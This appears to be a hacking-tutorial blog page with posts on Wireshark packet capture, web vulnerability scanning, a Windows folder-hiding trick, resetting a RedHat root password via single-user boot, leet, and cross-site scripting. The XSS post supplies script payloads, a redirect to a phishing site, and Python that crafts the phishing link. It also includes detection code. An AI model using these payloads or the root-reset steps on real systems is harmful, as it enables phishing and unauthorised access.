Wireshark

Hello GreenHackerz readers...
This article is about Wireshark, a tool for analysing network traffic.
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.


Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.


Functionality: 
Wireshark is very similar to tcpdump, but has a graphical front-end, plus integrated sorting and filtering options. Wireshark allows the user to put network interfaces that support promiscuous mode into that mode, in order to see all traffic visible on that interface, not just traffic addressed to one of the interface's configured addresses. On Linux, BSD, and Mac OS X, with libpcap 1.0.0 or later, Wireshark 1.4 and later can also put Wi-Fi adapters into monitor mode.

Features:
Wireshark is software that "understands" the structure of different networking protocols. Thus, it can display the encapsulation and the individual fields, with their meanings, of packets of every protocol it has a dissector for. Wireshark uses pcap to capture packets, so it can only capture on the types of networks that pcap supports.
  • Data can be captured "from the wire" from a live network connection or read from a file that recorded already-captured packets.
  • Live data can be read from a number of types of network, including Ethernet, IEEE 802.11, PPP, and loopback.
  • Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, TShark.
  • Captured files can be programmatically edited or converted via command-line switches to the "editcap" program.
  • Data display can be refined using a display filter.
  • Plug-ins can be created for dissecting new protocols.
  • VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can even be played.
  • Raw USB traffic can be captured with Wireshark. At the time of writing this feature is available only under Linux.
Wireshark's native network trace file format is the libpcap format supported by libpcap and WinPcap, so it can exchange files of captured network traces with other applications using the same format, including tcpdump and CA NetMaster. It can also read captures from other network analysers, such as snoop, Network General's Sniffer, and Microsoft Network Monitor.

Security:
Capturing raw network traffic from an interface requires elevated privileges on some platforms. For this reason, older versions of Ethereal/Wireshark and tethereal/TShark often ran with superuser privileges. Given the huge number of protocol dissectors that are invoked on captured traffic, this poses a serious security risk: a bug in any one dissector is reachable by whoever can put packets on the wire. Because of the rather large number of vulnerabilities in the past (many of which allowed remote code execution) and doubts that this would improve, OpenBSD removed Ethereal from its ports tree prior to OpenBSD 3.6.
Elevated privileges are not needed for all of the operations. For example, an alternative is to run tcpdump, or the dumpcap utility that comes with Wireshark, with superuser privileges to capture packets into a file, and later analyze the packets by running Wireshark with restricted privileges. On wireless networks, it is possible to use the Aircrack wireless security tools to capture IEEE 802.11 frames and read the resulting dump files with Wireshark.
As of Wireshark 0.99.7, Wireshark and TShark run dumpcap to do traffic capture. On platforms where special privileges are needed to capture traffic, only dumpcap needs to be set up to run with those special privileges: neither Wireshark nor TShark need to run with special privileges, and neither of them should be run with special privileges.

Obtain appropriate Wireshark package
Obtain a Wireshark package or installer for the operating system running on the system which is to be used for packet capture.
Wireshark is included in Novell's SUSE Linux products (for some products, under its old name, Ethereal). For other platforms, download a binary or installer from http://www.wireshark.org. With installers, ensure all product components are selected for installation.

Start Wireshark:
Start Wireshark. On a Linux or Unix environment, select the Wireshark or Ethereal entry in the desktop environment's menu, or run "wireshark" (or "ethereal") from a terminal emulator as an ordinary user; give the capture privileges to dumpcap as described in the Security section rather than running Wireshark itself as root. In a Microsoft Windows environment, launch wireshark.exe from C:\Program Files\Wireshark.

Note: On Unix systems, a non-GUI version of Wireshark called "tshark" (or "tethereal") may be available as well, but its use is beyond the scope of this document.

Configure Wireshark:
After starting Wireshark, do the following:

1. Select Capture | Interfaces
2. Select the interface on which packets need to be captured.
3. If capture options need to be configured, click the Options button for the chosen interface. Note the following recommendations for traces that are to be analysed by Novell Technical Services.
  • Capture packet in promiscuous mode: This option allows the adapter to capture all traffic, not just traffic destined for this workstation. It should be enabled.
  • Limit each packet to: Leave this option unset. Novell Support will always want to see full frames.
  • Filters: Generally, Novell Support prefers an unfiltered trace. For documentation on filters, please refer to TID 10084702 - How to configure a capture filter for Ethereal (formerly NOVL90720).
  • Capture file(s): This allows a file to be specified to be used for the packet capture. By default Wireshark will use temporary files and memory to capture traffic. Specify a file for reliability.
  • Use multiple files, Ring buffer with: These options should be used when Wireshark needs to be left running capturing data for a long period of time. The number of files is configurable. When a file fills up, it will wrap to the next file. The file name should be specified if the ring buffer is to be used.
  • Stop capture after xxx packet(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
  • Stop capture after xxx kilobyte(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.
  • Stop capture after xxx second(s): Novell Technical Support would most likely never use this option. Leave disabled.
  • Update list of packets in real time: Disable this option if the problem that's being investigated is occurring on the same workstation as where Wireshark is running.
  • Automatic scrolling in live capture: Wireshark will scroll the window so that the most current packet is displayed.
  • Hide capture info dialog: Disable this option so that you can view the count of packets being captured for each protocol.
  • Enable MAC name resolution: Wireshark contains a table to resolve MAC addresses to vendors. Leave enabled.
  • Enable network name resolution: Wireshark will issue DNS queries to resolve IP host names, and will also attempt to resolve network names for other protocols. Leave disabled; the extra queries pollute the trace and slow the capture.
  • Enable transport name resolution: Wireshark will attempt to resolve transport names. Leave disabled.
4. Now click the Start button to start the capture
5. Recreate the problem. The capture dialog should show the number of packets increasing. If not, stop the capture, examine the interface list and pick the one that is not associated with the WAN IP; it will probably be a long alphanumeric string. If packets are still not being captured, try removing any filters that have been defined.
6. Once the problem which is to be analysed has been reproduced, click on Stop. It might take a few seconds for Wireshark to display the packets captured.

If the destination address is always displayed as FFFFFFFF (IPX) or always ends in .255 (IP) then all that has been captured is broadcast traffic. This is a useless trace.
This usually occurs when another machine is being traced (to start the trace while the target machine is powered off, in order to capture the bootup process). The capture setup needs to be reconsidered - port mirroring on the switch may need to be set up, or a dumb hub may need to be used to make the traffic reach the sniffing system. (Some devices advertised as "hubs" are in fact switches that may have the intelligence to prevent the workstations from seeing each other's packets; with these, getting a good trace may not be possible)
The Wireshark website has a good FAQ on this subject. Please refer to http://www.wireshark.org/faq.html#q7.1

7. Save the packet trace in any supported format. Just click on the File menu option and select Save As. By default Wireshark will save the packet trace in libpcap format, a file with a .pcap extension. Use this default for files sent to Novell. (Newer Wireshark releases default to the pcapng format instead; pick pcap in the Save As dialog if the recipient needs libpcap.)
8. Create a trace_info.txt file with the IP and MAC address of the machines that are being traced as well as any pertinent information, such as:
  • What is the problem? (when did it start? steps to reproduce? any other pertinent information)
  • What steps were traced?
  • Give names of the servers and files being accessed.
  • If analysis of the trace has already been attempted, please provide Novell Support with analysis notes.
      For example: Packets 1-30 are boot. Packets 31-500 are login. Packets 501 to 1,000 is my application 
      loading. Packet 1,001 to 1,500 is me saving my file. The error occurred at approximately packet 1,480.
  • Give the MAC addresses of the hardware involved (workstation, servers, printers ...).
  • What is the workstation OS and configuration?
  • What version of client software is running?
  • If it works with one version of the client (or a particular server patch), then get a trace of it working, and a trace of it not working.
  • For Novell Client issues: Are there any client patches loaded?
  • For NetWare servers: What version of NetWare (and other relevant products i.e. ZEN or NDPS) are running on the server?
  • What patches have been applied?
  • What is the configuration of the network? Are there routers involved? If so, what kind of routers?
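As an added example (not from the original page or the Novell TID it draws on), the following Python script writes a small capture in the libpcap format described above, reads it back with a minimal parser of the 24-byte global header and 16-byte record headers, and applies the sanity check from step 6: if every frame is addressed to ff:ff:ff:ff:ff:ff or to an IPv4 address ending in .255 (the page's rule of thumb; an exact check would need the subnet mask), the trace was taken from a switched port that never saw the target's unicast traffic. The frames, MAC addresses and IP addresses are constructed here for the demonstration. A reader like this needs no privileges, which is the point of capturing with dumpcap and analysing the file as an ordinary user.

```python
"""Minimal libpcap writer/reader plus the broadcast-only sanity check from step 6."""
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4      # first four bytes read little-endian
PCAP_MAGIC_BE = 0xD4C3B2A1      # same bytes as written by a big-endian host
LINKTYPE_ETHERNET = 1
BROADCAST_MAC = b"\xff" * 6
ETHERTYPE_IPV4 = b"\x08\x00"


def ethernet_ipv4_udp(dst_mac, src_mac, dst_ip, src_ip, payload=b"x"):
    """Constructed Ethernet/IPv4/UDP frame (checksums left zero; enough for parsing)."""
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return dst_mac + src_mac + ETHERTYPE_IPV4 + ip + udp


def write_pcap(frames, snaplen=65535):
    """Serialise frames as a libpcap file: global header, then one record header per frame."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        # ts_sec, ts_usec, incl_len (bytes saved), orig_len (bytes on the wire)
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def read_pcap(data):
    """Yield (timestamp, frame) from a libpcap blob; rejects pcapng and other formats."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a libpcap file (pcapng, snoop, Sniffer ... need other readers)")
    _snaplen, linktype = struct.unpack(end + "II", data[16:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        frame = data[off:off + incl_len]
        if len(frame) != incl_len:
            raise ValueError("truncated record: capture stopped mid-write?")
        off += incl_len
        yield ts_sec + ts_usec / 1e6, frame


def is_broadcast(frame):
    """Step 6's rule of thumb: broadcast MAC, or an IPv4 destination ending in .255."""
    if frame[:6] == BROADCAST_MAC:
        return True
    if frame[12:14] == ETHERTYPE_IPV4 and len(frame) >= 34:
        return frame[33] == 0xFF        # last octet of the IPv4 destination address
    return False


def broadcast_only(data):
    """True when every frame in the capture is broadcast, i.e. the trace is useless."""
    frames = [f for _, f in read_pcap(data)]
    return bool(frames) and all(is_broadcast(f) for f in frames)


def sample_capture(with_unicast):
    """Constructed capture: two broadcasts, plus one unicast frame if requested."""
    ws = bytes.fromhex("0011223344aa")     # hypothetical workstation MAC
    srv = bytes.fromhex("0011223344bb")    # hypothetical server MAC
    frames = [
        ethernet_ipv4_udp(BROADCAST_MAC, ws, "192.168.1.255", "192.168.1.20"),
        ethernet_ipv4_udp(BROADCAST_MAC, srv, "192.168.1.255", "192.168.1.5"),
    ]
    if with_unicast:
        frames.append(ethernet_ipv4_udp(srv, ws, "192.168.1.5", "192.168.1.20"))
    return write_pcap(frames)


if __name__ == "__main__":
    with open("sample.pcap", "wb") as fh:       # opens in Wireshark, or: tshark -r sample.pcap
        fh.write(sample_capture(with_unicast=True))
    for good in (False, True):
        print("broadcast only:", broadcast_only(sample_capture(good)))
```

Run as a script it writes sample.pcap, which Wireshark or `tshark -r sample.pcap` will open, and prints True for the broadcast-only capture and False once a unicast frame is present. Feed a real dumpcap output file to broadcast_only() before sending a trace anywhere.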
Wireshark can be downloaded directly from the Wireshark website, http://www.wireshark.org.

Hope this gives you ample information and that you like it.

Web Vulnerability Assessment

Hello GreenHackerz..
I hope you all enjoy & learn to be with Us..
Today I'm going to write something about vulnerabilities, vulnerability assessment and vulnerability assessment tools. Hope you like it.
So Let's Start..

Vulnerability

In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.
Vulnerability is the intersection of three elements :
(1) A system susceptibility or flaw
(2) Attacker access to the flaw
(3) Attacker capability to exploit the flaw

To be vulnerable, an attacker must have at least one applicable tool or technique that can connect to a system weakness. The set of weaknesses an attacker can reach in this way is the system's attack surface.



Vulnerability Assessment

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. 

Web Vulnerability Assessment Essentials: Your First Step to a Highly Secure Web Site

If an organization isn't taking a systematic and proactive approach to web security, and to running a web application vulnerability assessment in particular, then that organization isn't defended against the most rapidly increasing class of attacks. Web-based attacks can lead to lost revenue, the theft of customers' personally identifiable financial information, and falling out of regulatory compliance with a multitude of government and industry mandates: the Payment Card Industry Data Security Standard (PCI DSS) for merchants, HIPAA for health care organizations, or Sarbanes-Oxley for publicly traded companies. In fact, the research firm Gartner estimates that 75 percent of attacks on web security today are aimed straight at the application layer.

Just What Is a Web Application Vulnerability Assessment?

A web application vulnerability assessment is the way you go about identifying the mistakes in application logic, configurations, and software coding that jeopardize the availability (things like poor input validation that can make it possible for an attacker to inflict costly system and application crashes, or worse), confidentiality (SQL injection, among many other types of attacks that make it possible for attackers to gain access to confidential information), and integrity of your data (certain attacks make it possible for attackers to change pricing information, for example).
Web application vulnerability scanners are very good at what they do: identifying technical programming mistakes and oversights that create holes in web security. These are coding errors, such as not checking input strings, or failure to properly filter database queries, that let attackers slip in, access confidential information, and even crash your applications. Vulnerability scanners automate the process of finding these types of web security issues; they can tirelessly crawl through an application performing a vulnerability assessment, throwing countless variables into input fields in a matter of hours, a process that could take a person weeks to do manually.

How to Conduct Your Vulnerability Assessment

To conduct a web vulnerability assessment you need a scanner; this post uses Acunetix Web Vulnerability Scanner (WVS) as the example.

Acunetix Web Vulnerability Scanner



Introduction :-

  • Acunetix web vulnerability scanner is a tool designed to discover security holes in your web applications that an attacker would likely abuse to gain illicit access to your systems and data. It looks for multiple vulnerabilities including SQL injection, cross site scripting, and weak passwords.
  • The application can be used to perform scanning for web and application vulnerabilities and to perform penetration testing against the identified issues. Mitigation suggestions are then provided for each weakness and can be used to increase the security of the web server or application being tested.

Graphical Interfaces :

  • The Scan Wizard allows you to quickly set up an automated crawl and scan of your website. An automated scan provides a comprehensive and deep understanding of the level of website security by simply reviewing the individual alerts returned.
  • NOTE: DO NOT SCAN A WEBSITE WITHOUT PROPER AUTHORISATION! The web server logs will show the scans and any attacks made by Acunetix WVS. If you are not the sole administrator of the website please make sure to warn other administrators before performing a scan. Some scans might cause a website to crash requiring a restart of the website.
Select Target(s) to Scan:

(1) Click on ‘File > New > New Website Scan’ to start the Scan Wizard or click on ‘New Scan’ button on the top right hand of the Acunetix WVS user interface.



(2) Specify the target or targets to be scanned. The scan target options are:



  • Scan single website - Scans a single website. Enter a URL, e.g. http://testphp.acunetix.com or http://testaspnet.acunetix.com.
  • Scan using saved crawling results - If you previously performed a crawl on a website and saved the results, you can analyze these results directly without having to crawl the site again. Specify the ‘Saved crawler results’ file by clicking on the folder button.
  • Scan List of Websites - Scans a list of target websites specified in a plain text file (one target per line). Every target in the file is to be specified in the format <URL> or <URL:port> if the web server is listening on a non-default port. The maximum number of websites Acunetix WVS can scan at one time is between 20 and 30 sites, depending on the size of the websites.
  • Scan Range of Computers - This will scan a specific range of IP's (e.g. 192.168.0.10-192.168.0.200) for target sites which are open on the specified ports (Default 80, 81 and 443).
(3) Click 'Next' to continue.

Confirm Targets and Technologies Detected:



  • Acunetix WVS will automatically probe the target website(s) for basic details such as operating system, web server, web server technologies and whether a custom error page is used (for more details on custom error pages refer to the Acunetix WVS manual).
  • The web vulnerability scanner will optimize the scan for the selected technologies and use these details to reduce the number of tests performed which are not applicable (e.g. Acunetix WVS will not probe IIS tests on a UNIX system). This will reduce scanning time.
  • Click on the relevant field and change the settings from the provided check boxes if you would like to add or remove scans for specific technologies

Scanning Profile:

The Scanning Profile will determine which tests are to be carried out against the target site. For example, if you only want to test your website(s) for SQL injection, select the profile sql_injection and no additional tests would be performed. 

Pros:

  1. Quick scanning
  2. Specify custom error pages
  3. Combines many tools into one application
  4. High detection rate of vulnerabilities
  5. Does not overrate minor vulnerabilities

Cons:

  1. Reporting is not robust
  2. Target identifier appeared to be buggy
  3. Could use some interface tweaks
Hope you all like this...

How to lock folder without any software.

                         


Hello GreenHackerz readers.........
The post is funny and knowledgeable; it's about locking a folder without using any software.

You can lock and unlock your folder with this simple trick !
Note: The trick is for windows XP users

The Procedure is as follow :
1. Make a folder on the desktop or any where else as you like and name it (give any name).
2. Now, open notepad and write "ren <your folder name> <again your folder name>.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
(without the double inverted commas) and now go to Notepad Menu File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Note: Save this batch file where you create the folder).
4. Now, again open notepad and write "ren <your foldername>.{21EC2020-3AEA-1069-A2DD-08002B30309D} <your folder name>" and again go to Notepad Menu File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Note: Save this batch file at the same place where you saved the lock.bat and your folder).
6. Now, double click on the lock.bat to lock the folder and now if you open your folder, control panel will open up.
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data  inside the folder again.
8. Lock your folder and hide the key.bat somewhere else on your hard disk.
9. Whenever you want to open your folder just paste the key.bat to the place where is your folder and open your folder using it.

Nice and funny trick, but note that it is not real protection: the folder is only renamed with the Control Panel CLSID, so Explorer shows Control Panel while the files stay on disk untouched. Anyone can still reach them from a command prompt (dir, ren), by renaming the folder back, or from another operating system, so don't use this for anything sensitive.
Hope you like it.



Hacking Root Password of RedHat based operating System.

Hello GreenHackerz readers.
The tutorial is for Linux operating system.
The tutorial is all about hacking (resetting) the root password on RedHat, Fedora, or any other RedHat-based operating system when you have physical access to the machine.

If you have lost the root password on a RedHat-based system you first need access to the console (the machine itself). Power on or reboot the machine and wait until you get the following screen (or a similar one, depending on your system and configuration).
Note : Here I am using the Fedora operating system but the process is same for all RedHat based system.


At the GRUB boot menu press 'a' (append to the kernel command line) and you will get the following screen. (These keystrokes are for the GRUB legacy menu of the Fedora release shown; GRUB 2 uses 'e' to edit the entry, and on systemd-based releases single-user mode itself prompts for the root password, so the procedure there differs.)

 


Now add a space followed by '1' or the word 'single' at the end of the line and hit Enter. This boots into single-user mode, which gives a root shell without asking for a password.

You will get the shell prompt screen as shown below.

Now use the normal Linux password-changing command, passwd, and hit Enter. Because the shell is already running as root, it directly asks for the new password for user 'root'.

Now type reboot and hit Enter. That's it: the machine reboots and you can log in with the new password.

This works because anyone at the console can edit the boot entry, so console access is root access. If that is not acceptable, set a GRUB password, lock the boot order in the BIOS, and use full-disk encryption.

Hope you enjoyed the tutorial.

The Hackers Language - l33t


Hello Green Hackerz readers.... 
The Tutorial is about the Language used by the Hackers which is called "Hackers Language".

Language, in short, is a means to communicate with each other; people generally talk to each other using sentences, phrases and so on, and there are many different languages spoken around the world. Basically, every country has its own language, so it is not possible for outsiders to communicate with them, and it is very hard for a person to learn all those languages. For this reason people adopted a common language that can be used to communicate with everyone, i.e. English.


Hackers have also created their own language, which they use to communicate with each other.

The language hackers use to communicate with other hackers is 'leet'. For example, leet spellings of the word leet include 1337 and l33t. It was originally created by groups of chatters/gamers in the early 1980s; it was developed to frustrate the text filters set up by BBS and Internet chat system operators.


It is a cryptic way of writing used to shorten messages or to obscure their actual meaning. Note that it is obfuscation, not encryption: there is no key, and anyone who knows the substitutions can read it. The main purpose was to stop others from discouraging the discussion of proscribed topics such as hacking, cracking, and many more.


Let's read in deep.........

Language helps reinforce the barrier between computer hackers and non-hackers, as well as that between hackers and crackers. Computer hackers have developed their own language. Firstly there is vocabulary that non-hackers will not know (TCP, IP, winsock, Linux, root access, vi, etc.) due to a lack of computer-related knowledge. Secondly, some computer hackers have modified English with a set of conventions. Hackers replace ‘f’ with ‘ph’ (likely coming from phreaks who were interested in ‘ph’ones), and ‘s’ with ‘z’. Also hackers use numbers in place of letters such as ‘1’ for ‘i’ or ‘l’ (though replacing ‘i’ is not the proper usage), ‘3’ for ‘E,’ ‘4’ for ‘a’, and ‘7’ for ‘t.’ Also it is important to use random caPitAlizaTioN, abbreviation, slang, emphasize words by putting ‘k-‘ before them ("k-rad"), and finish a statement with a series of characters for emphasis.


Take this example from an Internet Relay Chat message in a hacking group (#hack):
<elph> c4n sUm1 h31p m3 w1tH h4x0RiNg mY sk00lz c0mPz?!?!?!!?!?
Which translates to: "<elf> can someone help me with hacking my school’s computers?"

Let's take one more example. The image below shows a Google page written in leet.

The original is --

Google runs on a unique combination of advanced hardware and software. The speed you experience can be attributed in part to the efficiency of our search algorithm and partly to the thousands of low cost PC's we've networked together to create a superfast search engine. The heart of our software is PageRank (TM), a system for ranking web pages developed by our founders Larry Page and Sergey Brin at Stanford University. And while we have dozens of engineers working to improve every aspect of Google on a daily basis, PageRank continues to provide the basis for all of our web search tools.


According to "Lamer Speak," elf’s statement comes from the warez and crackerz subcultures. "Warez d00dz" are software pirates who are interested in copying the latest program (warez) or game (gamez). Crackers, in this sense, may refer to people who crack software protection or people who crack computer networks. While one will rarely see this extreme form of the dialect in serious computer hacking circles (thus distinguishing them from crackers and warez d00dz), some of it is widely adopted (notably using ‘ph’ and ‘z’) and thus helps to distinguish them from non-hackers and nostalgic hackers who would never use this dialect. Perhaps newcomers to hacking use this language because they think it will help them gain acceptance by the gate-keeping elite, substituting the proper language for their lack of knowledge. Or perhaps it is just seen by young teens as a cool way of talking. In real life, elf was banned (i.e. removed) from #hack very promptly after writing that statement. This exclusion is incredibly common, as newcomers are shot down repeatedly for requesting help in Phrack, on IRC, and on alt.2600 (a hacking Internet discussion group).


You can use this for creating your own


  • A = 4, /-\, @, ^, /\ , //-\\, ci
  • B = 8, ]3, ]8, |3, |8, ]]3, 13
  • C = (, { , [[, <, €
  • D = ), [}, |), |}, |>, [>, ]]), ร
  • E = 3, ii, €
  • F = |=,(=, ]]=, ph
  • G = 6, 9, (_>, [[6, &
  • H = #, |-|, (-), )-(, }{, }-{, {-}, /-/, \-\, |~|, []-[], ]]-[[
  • I = 1, !, |, ][, []
  • J = _|, u|, ;_[], ;_[[
  • K = |<, |{, ][<, ]]<, []<
  • L = |,1, |_, []_, ][_, £
  • M = /\/\, |\/|, [\/], (\/), /V\, []V[], \\\, (T), ^^, .\\, //., ][\\//][,
  • N = /\/, |\|, (\), /|/, [\], {\}, ][\][, []\[], ~
  • O = 0, (), [], <>, *, [[]]
  • P = |D, |*, |>, []D, ][D
  • Q = commas are necessary: (,) or 0, or O, or O\ or []\
  • R = |2, |?, |-, ]]2 []2 ][2
  • S = 5, $
  • T = 7, +, ']‘, 7`, ~|~, -|-, ‘][', "|", †
  • U = (_), |_|, \_\, /_/, \_/, []_[], ]_[, ยต
  • V = \/ , \\//
  • W = \/\/, |/\|, [/\], (/\), VV, ///, \^/, \\/\//, 1/\/, \/1/, 1/1/
  • X = ><, }{, )(, }[
  • Y = ‘/, %, `/, \j , “//, ¥, j, \|/, -/
  • Z = 2, z, 7_,`/_

Other than this there are so many converters available on net you can download from the below link.

Make your own leet & enjoy.
Hope you like the tutorial ...

Cross Site Scripting

Hello GreenHackerz....
Cross site scripting (XSS) occurs when a website places attacker-supplied input into a page without encoding it, so other users' browsers interpret that input as HTML or script and the application does something it wasn't intended to do. XSS flaws are very common and some of the biggest websites have been affected by them, including the FBI, CNN, eBay, Apple, Microsoft, and AOL. Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields

There are three types of XSS attacks:
1. Local – Local (DOM-based) XSS attacks are by far the rarest and the hardest to find, because the injection happens in the page's own client-side JavaScript, which writes untrusted data (part of the URL, for example) into the document without the server ever seeing it. Like the other two types it gives the attacker script execution inside the victim's browser session; installing worms, spambots or backdoors on the victim's computer would additionally require a browser exploit.

2. Non-Persistent – Non-persistent (reflected) attacks are the most common type and don't change anything stored on the website. They occur when JavaScript (a scripting language used for client-side web development) or HTML supplied in a request parameter is copied into the page the user sees. Non-persistent attacks are only triggered when the user visits the URL crafted by the attacker.

3. Persistent – Persistent (stored) attacks are usually used against web applications that store and redisplay user content, such as guest books, forums, and shout boxes, so the payload runs for every visitor. Some of the things a hacker can do with a persistent attack are:

• Steal website cookies (Cookies are used by web browsers to store your session so that you stay logged into a website even after you leave. By stealing your session cookie, the attacker can sometimes log in as you without knowing your password; marking the cookie HttpOnly keeps page script from reading it.)
• Deface the website
• Spread Worms

Now that you know what cross site scripting is, how can you tell if a website is vulnerable to it?
1. If there is a search field, enter a word and if that word is displayed back to you on the next page, there's a chance it is vulnerable.
2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word "hi" is rendered as a big header, it is vulnerable.



3. Now we will insert JavaScript. Search for <script>alert("hi");</script>, and if the word "hi" pops up in an alert box, the site is vulnerable to XSS.



4. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent and everyone that visits the page would get the above alert if that was part of his comment.
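The three search-box steps above, and the payload-throwing that automated scanners do (described in the Web Vulnerability Assessment post earlier on this page), as an added Python example that is not from the original post. The handlers are stand-ins for a server-side search page, written here so the check runs offline: one echoes the query unencoded (the bug), one HTML-encodes it, and two more show that encoding alone is not enough when the value lands in an unquoted attribute. The marker string, handler names and the onmouseover payload are my choices.

```python
"""Reflected XSS: vulnerable and fixed handlers, plus the three-step probe from the text."""
import html


def search_vulnerable(query):
    """Stand-in for the vulnerable search page: the query is copied into the HTML unencoded."""
    return f"<html><body><h2>Results for: {query}</h2></body></html>"


def search_fixed(query):
    """Same page with the query HTML-encoded before it is placed in element content."""
    return f"<html><body><h2>Results for: {html.escape(query, quote=True)}</h2></body></html>"


def echo_attr_unquoted(query):
    """Encoded, but placed in an UNQUOTED attribute: a space still ends the value."""
    return f'<input type="text" name="searchbox" value={html.escape(query, quote=True)}>'


def echo_attr_quoted(query):
    """Encoded and quoted: the browser cannot leave the attribute value."""
    return f'<input type="text" name="searchbox" value="{html.escape(query, quote=True)}">'


# Steps 1-3 above, as the inputs a scanner would "throw into the input field".
PROBES = {
    "reflected": "xsscheck7",                    # step 1: is the input echoed at all?
    "html": "<h1>hi</h1>",                        # step 2: does markup survive intact?
    "script": '<script>alert("hi");</script>',    # step 3: would script run?
}


def probe(handler):
    """Send each probe through `handler` and record whether it comes back byte-for-byte."""
    return {name: payload in handler(payload) for name, payload in PROBES.items()}


def is_reflected_xss(handler):
    """Vulnerable if the input is echoed AND markup or script survives unencoded."""
    result = probe(handler)
    return result["reflected"] and (result["html"] or result["script"])


def attribute_breakout(handler, attr="value"):
    """Context check: an event handler injected into an unquoted attribute needs no < or >."""
    payload = "x onmouseover=alert(1)"
    return f"{attr}={payload}" in handler(payload)   # unquoted: the payload became new attributes


if __name__ == "__main__":
    for name, handler in [("vulnerable", search_vulnerable), ("fixed", search_fixed)]:
        print(name, probe(handler), "XSS" if is_reflected_xss(handler) else "ok")
    print("unquoted attribute breakout:", attribute_breakout(echo_attr_unquoted))
    print("quoted attribute breakout:", attribute_breakout(echo_attr_quoted))
```

Note that the fixed handler still reflects the marker (step 1 alone only says the input comes back, not that it is dangerous), and that html.escape is the right tool only for element content and quoted attribute values; data written into a script block or a URL needs that context's own encoding.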

Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic than the examples above, I will show you how a hacker could use XSS to help with phishing.

1. Let’s say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website.
2. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following:


Here you can see that the code you typed into the search box was passed to the “searchbox” variable.

3. In the URL the hacker would then replace everything between ?searchbox= and &search with the following JavaScript code:
                           <script>window.location = "http://phishing-site.com"</script>
4. Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com/ .

5. My finished encoded URL is: http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

6. Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.
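As an added example (mine, not the original post's), the following Python does the URL handling of steps 2-5 both ways round. craft_link builds the link correctly: only the parameter values are percent-encoded, whereas the step-5 string above encodes the whole URL including the scheme, which a browser will not treat as a link at all. decode_link and suspicious_params are the defender's side of step 6: peel the encoding off a link before trusting where it points, and flag parameters whose value carries script. The host localhost and the parameter names come from the URL in the text; the script-marker regular expression is a heuristic of my own.

```python
"""Crafting the redirect link correctly, and decoding a suspicious link before trusting it."""
import re
from urllib.parse import parse_qs, unquote_plus, urlencode, urlsplit

REDIRECT_PAYLOAD = '<script>window.location = "http://phishing-site.com"</script>'

# The encoded link from step 5, copied from the text above.
PAGE_LINK = ("http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location"
             "+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21")


def craft_link(base="http://localhost/form.php", param="searchbox"):
    """Percent-encode only the query values; the browser must still see a plain scheme and host."""
    return base + "?" + urlencode({param: REDIRECT_PAYLOAD, "search": "search!"})


def decode_link(url, max_rounds=3):
    """Peel percent-encoding (repeatedly, for double-encoded links) and parse the query string."""
    decoded = url
    for _ in range(max_rounds):
        peeled = unquote_plus(decoded)
        if peeled == decoded:
            break
        decoded = peeled
    return decoded, parse_qs(urlsplit(decoded).query, keep_blank_values=True)


# Heuristic markers for script in a parameter value: a script tag, a javascript: URL,
# or an on<event>= handler.
SCRIPT_MARKERS = re.compile(r"<\s*script|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_params(url):
    """Names of query parameters whose decoded value carries script; an empty list means clean."""
    _, params = decode_link(url)
    return sorted(name for name, values in params.items()
                  if any(SCRIPT_MARKERS.search(v) for v in values))


if __name__ == "__main__":
    link = craft_link()
    print("crafted:", link)
    print("decoded:", decode_link(link)[0])
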